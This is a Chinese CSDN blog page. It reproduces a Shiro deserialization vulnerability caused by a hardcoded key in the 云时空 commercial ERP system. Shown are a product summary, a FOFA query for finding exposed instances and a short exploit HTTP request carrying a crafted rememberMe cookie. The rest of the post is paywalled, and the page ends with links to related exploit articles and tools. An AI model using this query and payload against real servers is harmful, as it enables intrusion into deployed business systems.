云时空社会化商业 ERP 系统 Shiro 反序列化漏洞复现

最新推荐文章于 2024-10-15 10:20:47 发布

0xSecl

最新推荐文章于 2024-10-15 10:20:47 发布

阅读量962

点赞数 9

分类专栏：漏洞复现文章标签： web安全安全

本文链接：https://blog.csdn.net/qq_41904294/article/details/134702012

版权

漏洞复现专栏收录该内容

该专栏为热销专栏榜第88名

913 篇文章 1500 订阅 ¥9.90 ¥99.00

订阅专栏

超级会员免费看

0x01 产品简介

时空云社会化商业ERP（简称时空云ERP），该产品采用JAVA语言和Oracle数据库，融合用友软件的先进管理理念，汇集各医药企业特色管理需求，通过规范各个流通环节从而提高企业竞争力、降低人员成本，最终实现全面服务于医药批发、零售连锁企业的信息化建设的目标，是一款全面贴合最新GSP要求的医药流通行业一站式管理系统。

0x02 漏洞概述

云时空社会化商业 ERP 系统存在 shiro 反序列化漏洞，该漏洞源于软件存在硬编码的 shiro-key，攻击者可利用该 key 生成恶意的序列化数据，在服务器上执行任意代码，执行系统命令、或打入内存马等，获取服务器权限。

0x03 复现环境

FOFA：app="云时空社会化商业ERP系统"

0x04 漏洞复现

Exp

GET /static/js/public.js HTTP/1.1
Host: your-ip
Cookie: rememberMe=Y0ZDMzQ3ZUY0YjgzQzJGRfD/yYOCgtFSRejkdE0zN

了解本专栏

订阅专栏解锁全文

超级会员免费看

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

0xSecl

关注关注

9
点赞
踩
10

收藏

觉得还不错? 一键收藏
打赏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

专栏目录

订阅专栏

【漏洞复现】云时空社会化商业ERP系统命令执行漏洞

晚风不及你

04-24

126

云时空社会化商业ERP系统存在Shiro命令执行漏洞，攻击者可以通过此漏洞获取服务器权限。

云时空社会化商业ERP系统 user/online 身份认证绕过漏洞复现

0xSec

08-06

447

云时空社会化商业ERP系统 user/online 接口存在身份认证绕过漏洞，未授权的攻击者可利用漏洞url获取在线用户sessionid 导致用户信息泄露，并且切换网站session后可直接接管后，造成信息泄露或恶意破坏，使系统处于极不安全状态。

参与评论您还未登录，请先登录后发表或查看评论

云时空社会化商业ERP系统任意文件上传漏洞复现

败在我手中之敌，从来不会被我视为对手，我给你时间追赶，直至你遥望不见。

12-20

551

云时空商业ERP以大型集团供应链系统为支撑，是基于互联网技术的多渠道模式营销服务管理体系，可以整合线上和线下交易模式，覆盖企业经营管理应用各个方面。有效掌控全流程情况，敏捷捕捉消费者需求，快速响应市场变化，规避经营风险，以市场为导向，优化部署营销资源，协同产销、供应与服务，帮助您的企业构建敏捷的经营管理平台，还能通过互联网、人工智能等创新模式，整合流通企业上下游产业链资源，协助您共享数字服务，提升企业数字化管控效率。

【漏洞复现】云时空社会化商业ERP系统slogin SQL注入漏洞

晚风不及你

04-24

158

云时空社会化商业ERP系统slogin存在SQL注入漏洞，攻击者可以通过此漏洞获取数据库敏感信息。

云时空商业ERP params 存在SQL注入（含批量验证poc）

weixin_43567873的博客

04-28

307

云时空商业ERP params 存在SQL注入（含批量验证poc）

云时空社会化商业 ERP 系统 service SQL 注入漏洞复现

0xSec

11-30

1015

时空云社会化商业ERP service接口处存在SQL注入漏洞，未授权的攻击者可以利用 SQL 注入漏洞获取数据库中的信息（例如，管理员后台密码、站点的用户个人信息），甚至在高权限的情况可向服务器中写入木马，进一步获取服务器系统权限。

Shiro 反序列化漏洞复现

weixin_51559599的博客

12-08

1043

在 Apache shiro 的框架中，执行身份验证时提供了一个记住密码的功能（RememberMe），如果用户登录时勾选了这个选项。用户的请求数据包中将会在 cookie 字段多出一段数据，这一段数据包含了用户的身份信息，且是经过加密的。加密的过程是：用户信息=>序列化=>AES加密（这一步需要用密钥key）=>base64编码=>添加到 RememberMe Cookie 字段。勾选记住密码之后，下次登录时，服务端会根据客户端请求包中的 cookie 值进行身份验证，无需登录即可访问。

shiro 反序列化漏洞综合利用工具 shiro_attack_by J1anfen

11-05

在提到的 "shiro_attack_by J1anfen" 工具中，重点是针对 Apache Shiro 的一个特定安全问题：反序列化漏洞。 反序列化漏洞通常出现在程序中，当接收到从网络或持久存储中读取的数据，并将其转换回原来的对象实例时...

shiro反序列化漏洞暴力破解漏洞检测工具

09-14

1.shiro反序列化漏洞、暴力破解漏洞检测工具源码 2.shiro反序列化漏洞、暴力破解漏洞检测工具jar包 3.shiro反序列化漏洞、暴力破解漏洞检测工具启动方法 4.shiro反序列化漏洞、暴力破解漏洞检测工具使用方法 5.shiro...

Shiro反序列化漏洞检测工具

01-05

在Shiro的早期版本中，尤其是1.2.4及以下版本，存在一个严重的反序列化漏洞，这个漏洞可能导致远程代码执行（RCE）的风险，攻击者可以利用这个漏洞对目标系统进行非法操作。 反序列化漏洞通常出现在应用程序接收到...

生产企业WMS功能需求

09-01

本次项目为新建三层中心仓库，一楼包含物料装卸码头装卸区、输送线、Z型提升机、拆剁机器人、2个冷库、CL玻璃原材仓、2个其他异形件原材仓、办公区等；二楼包含原材仓智能货架、原材仓 2 层普通货架（栈板存放）；三楼全部为成品仓 2层普通货架（栈板存放）；一、二楼之间采用输送线+Z型提升机进行物料存取输送，栈板物料通过一、二、三楼之间的提升机进行物料输送。

shiro反序列化漏洞利用工具

11-09

图形化界面，该工具支持漏洞检测，请勿用作非法途径，否则后果自负。 Shiro550无需提供rememberMe Cookie，Shiro721需要提供一个有效的rememberMe Cookie 可以手工指定特定的 Key/Gadget/EchoType（支持多选），如果...

云VS本地，一言难尽的ERP

勇往直前的专栏

11-16

1773

——24K纯云的ERP就站在这里，一眼望去，满眼都是传统本地的影子。不知何时，厂商有组织、有目的、有预谋地通过结合流行词“云”将老产品或服务重新命名这样“云洗白”（Cloud-Washing）的行径成为了一种业内的潜规则。以时下流行的云ERP为例，其实很多所谓的云ERP实质内核还是传统本地ERP, 更有甚者连ERP都不是。企业被“云”这一词语所吸引，直到部署和运行起来，才发觉此云非彼云...

入门网络安全工程师要学习哪些内容

白帽子佳奇的博客

10-10

1383

大家都知道网络安全行业很火，这个行业因为国家政策趋势正在大力发展，大有可为!但很多人对还是不了解，不知道需要学什么?知了堂小编总结出以下要点。是一个概称，学习的东西很多，具体学什么看自己以后的职业定位。如果你以后想成为安全产品工程师，学的内容侧重点就和不一样，如果你想成为安全开发工程师，学的侧重点就和安全不一样。学的东西很泛，但选定方向就简单了。大致的学习流程总结就是：网络基础、操作系统、中间件、数据库。其中电脑基础：像系统Windows基础和Linux基础、HTML基础、代码JS基础等。

如何用3个月零基础入门网络安全？_网络安全零基础怎么学习